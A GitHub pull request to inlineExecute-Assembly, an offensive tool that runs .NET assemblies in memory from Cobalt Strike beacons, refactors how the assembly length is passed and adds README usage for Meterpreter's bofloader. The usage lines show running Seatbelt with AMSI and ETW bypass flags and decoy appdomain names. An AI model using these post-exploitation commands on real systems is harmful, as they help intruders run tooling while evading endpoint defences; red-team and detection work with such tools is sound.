Skip to content

Remove the explicit size argument #7

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
zeroSteiner wants to merge 2 commits into
base: main
Choose a base branch
from
Open

Remove the explicit size argument #7

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
e23318d
Remove the explicit size argument
zeroSteiner Dec 14, 2022
ad053b3
Add Metasploit docs too
zeroSteiner Dec 14, 2022
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -142,6 +142,17 @@ beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --m
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit
```

### Use Case

> *Execute .NET assembly (Meterpreter Version)*

### Syntax

```
meterpreter > load bofloader
meterpreter > execute_bof path/to/inlineExecute-Assemblyx64.o --format-string ziiiiizzzb "totesLegit" 0 0 0 0 1 "totesLegit" "totesLegit" "" file:/root/Desktop/Seatbelt.exe
```

## Caveats

1. While I have tried to make this as stable as possible, there are no guarantees things will never crash and beacons won’t die. We don’t have the added luxury of fork and run where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can’t stress how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
Expand Down
3 changes: 1 addition & 2 deletions inlineExecuteAssembly/inlineExecute-Assembly.cna
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -340,7 +340,6 @@ alias inlineExecute-Assembly {

#Reading assembly bytes and get the size in bytes
$fileHandle = openf($_dotNetAssembly);
$assemblyLength = lof($_dotNetAssembly);
$assemblyBytes = readb($fileHandle, -1);
closef($fileHandle);

Expand All @@ -349,7 +348,7 @@ alias inlineExecute-Assembly {
#-------------------------------------- Package and ship it --------------------------------------#

# pack our arguments
$bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes);
$bofArgs = bof_pack($1, "ziiiiizzzb", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyBytes);

# announce what we're doing
btask($1, "Running inlineExecute-Assembly by (@anthemtotheego)");
Expand Down
5 changes: 2 additions & 3 deletions src/inlineExecute-Assembly.c
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -336,7 +336,7 @@ void go(char* args, int length) {//Executes .NET assembly in memory
BOOL revertETW = 0;
BOOL mailSlot = 0;
ULONG entryPoint = 1;
size_t assemblyByteLen = 0;
int assemblyByteLen = 0;

//Extract data sent
appDomain = BeaconDataExtract(&parser, NULL);
Expand All @@ -348,8 +348,7 @@ void go(char* args, int length) {//Executes .NET assembly in memory
slotName = BeaconDataExtract(&parser, NULL);
pipeName = BeaconDataExtract(&parser, NULL);
assemblyArguments = BeaconDataExtract(&parser, NULL);
assemblyByteLen = BeaconDataInt(&parser);
char* assemblyBytes = BeaconDataExtract(&parser, NULL);
char* assemblyBytes = BeaconDataExtract(&parser, &assemblyByteLen);

//Create slot and pipe names
SIZE_T pipeNameLen = MSVCRT$strlen(pipeName);
Expand Down